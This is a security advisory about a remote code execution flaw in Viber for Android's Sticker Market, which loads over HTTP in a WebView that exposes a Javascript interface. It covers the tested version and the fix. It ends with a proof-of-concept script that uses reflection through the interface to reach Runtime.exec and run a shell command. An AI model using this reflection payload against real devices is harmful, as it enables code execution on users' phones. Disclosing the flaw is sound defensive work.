Viber for Android exposes insecure Javascript interface

Abstract

It was discovered that Viber's Sticker Market is affected by a remote code execution vulnerability. This is possible because the Market is loaded over an insecure connection (HTTP) in a WebView that exposes an insecure Javascript interface. Exploiting this issue allows for the execution of arbitrary Java code within the privileges of the Viber app.

Tested versions

This issue was successfully tested on Viber for Android version 4.3.0.712.

Fix

As of Viber version 5.2.0.2415 (released December 15, 2014) the target SDK was change from API Level 15 to API Level 19. Due to this, this issue is no longer exploitable devices running Android 4.2 (API Level 17) and newer.

Introduction

"The Sticker Market is the place to go for all of your sticker needs. From cakes to koalas to sushi, find the stickers that say what you're feeling with delightful animated characters!"

It was discovered that the Market is loaded over an insecure connection (HTTP) in a WebView that exposed an insecure Javascript interface. Due to this, a man in the middle can inject arbitrary Javascript within the Market WebView. The can be used to exploit the vulnerable Javascript interface to execute arbitrary Java code. This code will be executed with the privileges of the Viber app.

Javascript interface

Android apps targeting Android API Level 16 or earlier containing WebViews with one or more Javascript interfaces are affected by code execution vulnerabilities provided that an attacker can run arbitrary Javascript code within these WebViews. Viber for Android targets Android API Level 15. The Market contains a Javascript interface named App that is consequently vulnerable to arbitrary code execution. An attacker that manages to execute a man in the middle attack against a victim running Viber can leverage this issue to execute arbitrary Java code within the app.

Proof of concept

Injecting the following Javascript code in the HTML of a Market page will created a file on SD card:

<script>
function execute(cmd){
return window.App.getClass().forName('java.lang.Runtime')
.getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}
execute(['/system/bin/sh','-c','echo \"Lorem ipsum\" > /mnt/sdcard/viberrce.poc.txt']);
</script>

Vragen of feedback?